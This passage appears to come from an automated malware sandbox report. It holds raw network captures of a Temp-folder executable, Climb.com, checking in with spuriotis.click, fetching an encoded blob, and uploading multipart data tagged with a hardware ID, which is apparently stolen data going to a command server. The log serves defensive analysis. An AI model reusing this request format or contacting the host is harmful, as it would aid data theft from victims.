                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                    2024-12-28 08:29:31 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                                                                                                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.549774172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:29:52 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:29:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                    2024-12-28 08:29:53 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=0t514juth1c3ha8poanmt8el0c; expires=Wed, 23 Apr 2025 02:16:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s7sLZeAGEnYG0%2Bgn2abehTelo1v25DEmWQfNPUOaX0DOAsgQ0q9gMZbhQsM0R7C8IxrAsoMMvhNJPfa71GKPqCaqTmOQpbJd%2B1zDq3C1zA6KSdz55GjFOG0chwWO5neh9hU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902f65fffe447a-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2006&rtt_var=776&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1388492&cwnd=232&unsent_bytes=0&cid=c77a5d4b63c95da5&ts=1072&x=0"
                                                                                                                                                                    2024-12-28 08:29:53 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                    2024-12-28 08:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.549781172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:29:54 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 45
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:29:54 UTC45OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d
                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
                                                                                                                                                                    2024-12-28 08:29:55 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=0d4tj5j50al3jppf88gec9t4ph; expires=Wed, 23 Apr 2025 02:16:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nZo%2Fc5T8Y4jggbi9HftvuoA9q%2BiXPCVxFJOiKa6z%2BKxpgAPSU%2FVMm7%2BITLKiEOvF0w5%2BEDYkT7tHClp4RqG5t5WCoCtODoBdKbij2ltks%2FJLFynHcMSH0JuRkyd%2BkgUUhfI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902f742ec24337-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1574&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=944&delivery_rate=1811414&cwnd=222&unsent_bytes=0&cid=b6c66a555f2ad11f&ts=778&x=0"
                                                                                                                                                                    2024-12-28 08:29:55 UTC236INData Raw: 31 34 38 33 0d 0a 75 55 6b 48 4c 57 69 52 42 4b 64 4b 6a 4f 56 58 4c 43 74 58 4e 43 41 48 44 35 35 74 51 55 7a 47 71 71 4b 37 6d 38 42 59 42 58 72 43 61 33 45 50 55 71 55 6f 68 54 6e 70 78 32 31 59 57 53 4a 52 44 43 56 75 2b 6b 39 37 4b 71 66 47 30 64 36 33 34 69 35 6f 57 49 4d 76 5a 6b 45 62 39 43 69 46 4c 2f 54 48 62 58 64 51 64 56 46 4f 4a 54 57 38 43 43 73 75 70 38 62 41 32 76 43 76 4b 47 6b 5a 30 53 56 67 52 51 33 79 59 4d 59 6d 34 59 41 79 53 55 6f 39 57 6b 6c 71 5a 2f 4e 50 62 57 36 6a 30 49 43 42 75 59 30 39 63 52 76 30 4b 48 52 47 53 75 77 6f 33 47 6a 70 69 33 55 57 43 54 5a 52 51 6d 74 70 2b 67 59 70 4a 4b 37 4f 77 64 2f 78 73 44 46 6a 45 74 45 72 59 30 51 48 2b 33 54 4c 4c 4f 61 4c 4e 45
                                                                                                                                                                    Data Ascii: 1483uUkHLWiRBKdKjOVXLCtXNCAHD55tQUzGqqK7m8BYBXrCa3EPUqUohTnpx21YWSJRDCVu+k97KqfG0d634i5oWIMvZkEb9CiFL/THbXdQdVFOJTW8CCsup8bA2vCvKGkZ0SVgRQ3yYMYm4YAySUo9WklqZ/NPbW6j0ICBuY09cRv0KHRGSuwo3Gjpi3UWCTZRQmtp+gYpJK7Owd/xsDFjEtErY0QH+3TLLOaLNE
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 4e 4b 64 52 67 43 59 6e 57 38 56 32 4e 39 6c 73 76 52 79 4f 79 76 4b 6d 46 59 78 47 56 38 44 77 33 2f 4a 70 31 6f 35 6f 73 37 53 30 6f 36 55 55 4e 6c 66 2f 4d 50 49 43 61 73 7a 4d 72 57 39 71 30 30 62 52 2f 54 49 6d 4a 41 44 66 74 67 79 69 75 75 79 58 56 4a 55 58 55 4f 41 6b 56 39 2f 77 77 33 49 37 57 49 33 35 66 67 34 6a 31 72 57 49 4e 72 59 30 45 4c 2f 6d 62 58 49 4f 57 4d 4d 46 78 43 50 46 74 50 5a 57 44 32 41 43 41 75 6f 38 4c 4b 31 76 4f 6d 4e 32 6f 65 32 79 73 6c 41 55 72 30 66 6f 56 77 72 71 51 77 58 6b 34 35 51 41 42 66 4c 65 4e 42 4f 6d 36 6a 78 49 43 42 75 61 6f 2f 5a 42 76 51 4a 47 5a 48 41 65 46 6d 31 79 37 6a 67 69 64 49 54 44 74 63 51 58 64 6e 38 67 6b 67 4a 36 2f 42 78 64 37 39 34 6e 51 6e 48 38 4e 72 50 51 38 72 2f 6d 33 4a 49 76 6d 48 64
                                                                                                                                                                    Data Ascii: NKdRgCYnW8V2N9lsvRyOyvKmFYxGV8Dw3/Jp1o5os7S0o6UUNlf/MPICaszMrW9q00bR/TImJADftgyiuuyXVJUXUOAkV9/ww3I7WI35fg4j1rWINrY0EL/mbXIOWMMFxCPFtPZWD2ACAuo8LK1vOmN2oe2yslAUr0foVwrqQwXk45QABfLeNBOm6jxICBuao/ZBvQJGZHAeFm1y7jgidITDtcQXdn8gkgJ6/Bxd794nQnH8NrPQ8r/m3JIvmHd
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 57 54 6e 64 68 39 67 6b 73 49 36 69 49 6a 70 6e 2b 75 6e 6f 2f 57 50 45 6f 63 55 77 41 73 56 50 47 4a 75 43 41 49 77 35 57 65 30 38 43 59 6d 47 38 56 32 4d 6a 70 63 44 47 79 2f 61 76 4f 57 6b 57 31 43 35 71 52 77 72 7a 61 38 41 73 35 59 77 32 51 30 30 6e 58 45 4a 74 61 50 30 46 4b 57 37 71 69 4d 66 42 75 66 70 36 56 67 2f 51 61 56 42 4d 42 50 31 68 30 32 6a 78 79 53 77 4f 54 6a 6b 57 47 69 56 67 39 41 6f 6d 49 61 58 43 7a 74 7a 7a 72 6a 4a 70 47 38 6b 6b 59 55 38 47 2b 32 7a 49 4a 75 71 50 50 45 56 43 4d 31 5a 44 62 79 32 79 54 79 51 32 35 4a 43 41 37 66 36 75 4e 32 68 61 37 69 68 72 51 51 33 6c 4a 74 70 6d 39 38 63 79 51 67 6c 74 46 6b 35 73 62 66 63 46 4a 79 36 6a 78 63 58 61 2f 71 45 33 59 42 4c 56 4c 47 46 44 41 2f 35 67 78 53 2f 71 67 69 64 4c 51 44
                                                                                                                                                                    Data Ascii: WTndh9gksI6iIjpn+uno/WPEocUwAsVPGJuCAIw5We08CYmG8V2MjpcDGy/avOWkW1C5qRwrza8As5Yw2Q00nXEJtaP0FKW7qiMfBufp6Vg/QaVBMBP1h02jxySwOTjkWGiVg9AomIaXCztzzrjJpG8kkYU8G+2zIJuqPPEVCM1ZDby2yTyQ25JCA7f6uN2ha7ihrQQ3lJtpm98cyQgltFk5sbfcFJy6jxcXa/qE3YBLVLGFDA/5gxS/qgidLQD
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 59 2b 70 50 50 47 43 39 69 4d 66 56 75 66 70 36 62 68 48 4a 4a 57 74 47 42 2f 56 75 77 69 62 6a 6a 44 4e 46 54 6a 4a 51 54 32 31 67 2b 51 77 69 4b 71 37 61 77 39 4c 7a 72 7a 41 6e 56 70 73 73 66 51 39 53 73 30 48 4a 41 66 36 63 4a 31 67 4a 4b 68 68 62 4a 57 72 77 54 33 74 75 70 38 66 4a 31 76 47 71 4e 57 67 63 31 53 31 6a 51 67 2f 38 62 4e 63 67 34 49 6f 2b 51 55 49 6e 56 6b 39 68 59 66 67 48 4b 43 54 6b 68 6f 44 65 34 65 4a 69 4a 79 33 57 4a 47 56 4d 48 4c 4e 35 69 7a 47 75 67 44 6b 4f 45 58 56 61 54 47 56 69 38 41 4d 6f 4a 71 58 45 7a 74 37 38 71 7a 4a 76 43 74 6f 76 62 55 34 45 2f 47 66 42 4c 65 75 44 4d 6b 70 50 4f 68 59 4d 4a 57 72 6b 54 33 74 75 69 2b 2f 31 6d 39 69 59 65 6e 68 57 77 6d 74 69 51 30 71 72 4a 73 6b 72 34 6f 38 36 53 45 41 35 58 45 74
                                                                                                                                                                    Data Ascii: Y+pPPGC9iMfVufp6bhHJJWtGB/VuwibjjDNFTjJQT21g+QwiKq7aw9LzrzAnVpssfQ9Ss0HJAf6cJ1gJKhhbJWrwT3tup8fJ1vGqNWgc1S1jQg/8bNcg4Io+QUInVk9hYfgHKCTkhoDe4eJiJy3WJGVMHLN5izGugDkOEXVaTGVi8AMoJqXEzt78qzJvCtovbU4E/GfBLeuDMkpPOhYMJWrkT3tui+/1m9iYenhWwmtiQ0qrJskr4o86SEA5XEt
                                                                                                                                                                    2024-12-28 08:29:55 UTC916INData Raw: 43 63 74 6f 4d 33 50 32 50 69 6b 4b 47 41 52 79 53 56 6f 51 41 4c 37 62 38 51 73 36 34 6f 7a 51 6b 4d 30 55 55 78 72 5a 62 78 42 59 79 6d 38 69 4a 69 5a 32 4c 49 68 64 51 37 57 43 6d 68 41 53 75 77 6f 33 47 6a 70 69 33 55 57 43 54 78 45 52 6d 68 2f 39 51 67 74 49 61 66 61 77 64 54 79 73 44 31 6f 48 4e 77 6e 59 30 41 4d 38 6d 50 50 4a 4f 6d 43 50 6b 46 46 64 52 67 43 59 6e 57 38 56 32 4d 41 72 39 76 58 32 76 65 70 4c 48 78 59 78 47 56 38 44 77 33 2f 4a 70 31 6f 37 59 77 2b 53 6b 6b 35 56 6b 5a 6f 62 65 34 41 4a 43 6d 74 77 39 4c 54 2f 71 55 78 62 78 50 55 4c 58 64 44 42 4f 46 6a 31 7a 71 75 79 58 56 4a 55 58 55 4f 41 6c 4e 71 37 42 38 67 62 4a 58 65 77 38 2f 79 72 7a 59 6e 42 35 55 79 4a 55 67 47 73 7a 36 46 4c 75 47 4f 4e 6b 46 49 50 46 70 50 59 47 54 35
                                                                                                                                                                    Data Ascii: CctoM3P2PikKGARySVoQAL7b8Qs64ozQkM0UUxrZbxBYym8iJiZ2LIhdQ7WCmhASuwo3Gjpi3UWCTxERmh/9QgtIafawdTysD1oHNwnY0AM8mPPJOmCPkFFdRgCYnW8V2MAr9vX2vepLHxYxGV8Dw3/Jp1o7Yw+Skk5VkZobe4AJCmtw9LT/qUxbxPULXdDBOFj1zquyXVJUXUOAlNq7B8gbJXew8/yrzYnB5UyJUgGsz6FLuGONkFIPFpPYGT5
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 33 34 39 39 0d 0a 6a 52 51 37 77 62 38 59 76 35 34 45 2b 54 55 4d 36 55 55 52 68 62 66 63 49 4c 53 69 68 77 38 6d 5a 74 2b 49 39 66 31 69 44 61 30 4e 73 47 4f 46 55 79 79 76 31 78 79 6f 41 55 48 56 52 54 69 55 31 76 41 51 72 49 62 62 4e 79 64 48 39 71 7a 70 6a 45 74 59 73 5a 55 6f 48 39 6d 4c 4c 4c 4f 6d 48 4f 55 46 4f 50 56 6c 47 5a 57 4b 38 51 57 4d 70 76 49 69 59 6d 64 6d 70 4c 45 59 57 30 44 6b 6c 55 45 54 71 4a 73 49 6b 72 74 39 31 51 45 41 30 58 6b 78 70 5a 66 67 64 49 79 57 74 78 38 48 57 2b 61 45 37 62 52 44 4a 4c 57 56 45 41 76 52 75 77 53 62 38 68 6a 6f 4f 42 33 56 52 57 69 55 31 76 44 34 31 4b 61 50 48 67 76 44 2b 75 54 74 74 47 39 41 6e 4a 56 42 45 36 69 62 43 4a 4b 37 66 64 55 4e 46 4f 46 4a 51 61 57 33 38 42 69 51 6b 74 73 66 50 31 50 71 69
                                                                                                                                                                    Data Ascii: 3499jRQ7wb8Yv54E+TUM6UURhbfcILSihw8mZt+I9f1iDa0NsGOFUyyv1xyoAUHVRTiU1vAQrIbbNydH9qzpjEtYsZUoH9mLLLOmHOUFOPVlGZWK8QWMpvIiYmdmpLEYW0DklUETqJsIkrt91QEA0XkxpZfgdIyWtx8HW+aE7bRDJLWVEAvRuwSb8hjoOB3VRWiU1vD41KaPHgvD+uTttG9AnJVBE6ibCJK7fdUNFOFJQaW38BiQktsfP1Pqi
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 6b 71 62 30 4d 4c 39 47 48 4f 4f 75 57 56 50 6b 5a 4b 4f 31 35 4c 5a 57 50 38 44 69 34 75 35 49 61 41 33 75 48 69 59 69 63 39 2b 44 78 7a 52 55 6a 51 63 64 4d 69 36 59 73 6a 52 55 67 32 51 45 39 31 4c 62 4a 50 4d 69 6d 31 69 4a 6a 50 36 62 55 39 65 46 62 43 61 32 4a 44 53 71 73 6d 7a 69 66 67 69 6a 35 4b 51 44 42 65 51 57 42 6f 39 67 4d 76 4c 36 7a 42 79 74 7a 38 70 44 42 6b 46 74 51 71 61 55 73 44 2f 57 2b 46 5a 71 36 41 4c 51 34 52 64 57 42 53 59 6e 58 78 48 32 45 63 70 39 6e 52 7a 50 53 79 50 43 55 33 32 43 64 6d 53 67 33 6a 4a 74 70 6d 39 38 63 79 51 67 6c 74 46 6b 4a 68 59 66 38 49 4c 53 47 70 78 38 66 53 39 71 67 30 64 52 66 65 49 32 6c 48 42 2b 46 73 7a 7a 72 6e 6a 6a 68 41 51 53 64 56 41 69 73 74 2b 78 64 6a 64 75 54 36 79 74 72 31 74 44 64 6f 57
                                                                                                                                                                    Data Ascii: kqb0ML9GHOOuWVPkZKO15LZWP8Di4u5IaA3uHiYic9+DxzRUjQcdMi6YsjRUg2QE91LbJPMim1iJjP6bU9eFbCa2JDSqsmzifgij5KQDBeQWBo9gMvL6zBytz8pDBkFtQqaUsD/W+FZq6ALQ4RdWBSYnXxH2Ecp9nRzPSyPCU32CdmSg3jJtpm98cyQgltFkJhYf8ILSGpx8fS9qg0dRfeI2lHB+FszzrnjjhAQSdVAist+xdjduT6ytr1tDdoW
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 78 42 50 52 79 77 69 62 6f 68 33 55 41 43 54 6f 57 47 6c 77 74 74 45 38 63 59 4f 54 51 67 49 47 35 6c 7a 6c 70 46 74 77 39 64 41 49 70 35 48 44 50 4d 36 79 68 4d 6c 39 41 49 31 74 51 4a 53 4f 38 43 57 4e 32 39 49 61 41 33 65 6a 69 59 6a 64 4b 67 48 34 32 47 46 71 68 65 59 73 78 72 70 46 31 46 68 74 37 46 6c 41 6c 4e 62 78 49 49 44 79 32 7a 73 50 50 2b 75 55 45 57 54 6a 51 50 57 52 43 41 66 39 59 2b 7a 33 74 69 54 74 4a 58 79 51 57 44 43 56 69 76 46 63 61 62 75 79 49 2f 35 65 35 75 6e 6f 2f 57 4f 34 6f 61 30 45 4e 35 58 65 49 43 4f 57 52 4e 45 4e 43 4f 52 52 44 61 48 33 37 54 32 31 75 6f 6f 69 59 69 62 66 69 50 6e 5a 59 67 33 73 33 46 46 2b 67 4d 5a 56 36 38 63 6b 73 44 6c 39 31 44 68 41 72 4c 65 35 50 65 32 37 6a 79 39 4c 4c 2f 36 45 73 5a 46 2f 6c 46 55
                                                                                                                                                                    Data Ascii: xBPRywiboh3UACToWGlwttE8cYOTQgIG5lzlpFtw9dAIp5HDPM6yhMl9AI1tQJSO8CWN29IaA3ejiYjdKgH42GFqheYsxrpF1Fht7FlAlNbxIIDy2zsPP+uUEWTjQPWRCAf9Y+z3tiTtJXyQWDCVivFcabuyI/5e5uno/WO4oa0EN5XeICOWRNENCORRDaH37T21uooiYibfiPnZYg3s3FF+gMZV68cksDl91DhArLe5Pe27jy9LL/6EsZF/lFU
                                                                                                                                                                    2024-12-28 08:29:55 UTC1369INData Raw: 50 70 64 6d 72 6f 4d 6b 44 68 46 6c 42 42 6b 77 50 71 74 66 63 54 48 71 30 59 44 50 75 66 70 6f 4b 56 6a 4a 61 7a 30 50 54 66 42 30 31 79 37 74 6b 54 59 4a 64 77 74 77 51 57 4a 72 2f 77 45 30 50 2b 62 6e 77 39 4c 31 72 6a 31 78 4a 75 55 2b 5a 6b 45 45 39 48 44 55 61 4b 44 48 4f 67 34 52 44 42 5a 54 62 32 71 77 52 32 38 2f 74 38 62 4c 7a 2f 37 69 42 53 6c 59 77 32 73 39 44 7a 2f 77 61 4d 73 76 2b 4a 5a 34 61 45 6f 79 55 45 46 72 65 75 31 50 62 57 36 69 69 4a 69 4c 74 2b 49 2b 64 6c 69 44 65 7a 63 55 58 36 41 78 6c 58 72 78 79 53 77 4f 58 33 55 4f 45 53 73 74 37 6b 39 37 62 75 50 47 7a 64 6a 36 72 44 6c 31 43 74 30 6f 63 30 78 4e 7a 56 6a 67 4a 65 4f 43 4f 30 6c 33 43 33 64 49 64 57 44 7a 43 42 30 51 6b 39 6e 48 79 62 75 45 4f 58 45 62 6d 32 55 6c 56 30 71
                                                                                                                                                                    Data Ascii: PpdmroMkDhFlBBkwPqtfcTHq0YDPufpoKVjJaz0PTfB01y7tkTYJdwtwQWJr/wE0P+bnw9L1rj1xJuU+ZkEE9HDUaKDHOg4RDBZTb2qwR28/t8bLz/7iBSlYw2s9Dz/waMsv+JZ4aEoyUEFreu1PbW6iiJiLt+I+dliDezcUX6AxlXrxySwOX3UOESst7k97buPGzdj6rDl1Ct0oc0xNzVjgJeOCO0l3C3dIdWDzCB0Qk9nHybuEOXEbm2UlV0q


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.549787172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:29:57 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=4940WYF3RM3
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 12791
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:29:57 UTC12791OUTData Raw: 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 34 39 34 30 57 59 46 33 52 4d 33 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                    Data Ascii: --4940WYF3RM3Content-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--4940WYF3RM3Content-Disposition: form-data; name="pid"2--4940WYF3RM3Content-Disposition: form-data; name="lid"5FwhVM--lll--4940WYF3RM3Conten
                                                                                                                                                                    2024-12-28 08:29:58 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:29:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=4csrdvj0kqrcnn6c71sf9ol5mf; expires=Wed, 23 Apr 2025 02:16:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSgf76DzvqEZdXp8JaPe8dScGT1r5jkDbXwtFJjJiw%2FaUbab6mXJZuqvbLE2XtbmrEn7XMe%2FYldb5pCJ6X683kjrbhLKiMJ7H9LHfpyXa5neS0eqCgBeMFQmfNthc6bmXDc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902f835b0c43d3-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1730&rtt_var=659&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13723&delivery_rate=1647855&cwnd=236&unsent_bytes=0&cid=28ac79a29fc359ab&ts=961&x=0"
                                                                                                                                                                    2024-12-28 08:29:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-28 08:29:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.549794172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:30:00 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=EDJ2WBQBJ7B
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 15033
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:30:00 UTC15033OUTData Raw: 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 45 44 4a 32 57 42 51 42 4a 37 42 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                    Data Ascii: --EDJ2WBQBJ7BContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--EDJ2WBQBJ7BContent-Disposition: form-data; name="pid"2--EDJ2WBQBJ7BContent-Disposition: form-data; name="lid"5FwhVM--lll--EDJ2WBQBJ7BConten
                                                                                                                                                                    2024-12-28 08:30:00 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:30:00 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=5jqd053pvmobp9u84d791cnlgq; expires=Wed, 23 Apr 2025 02:16:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
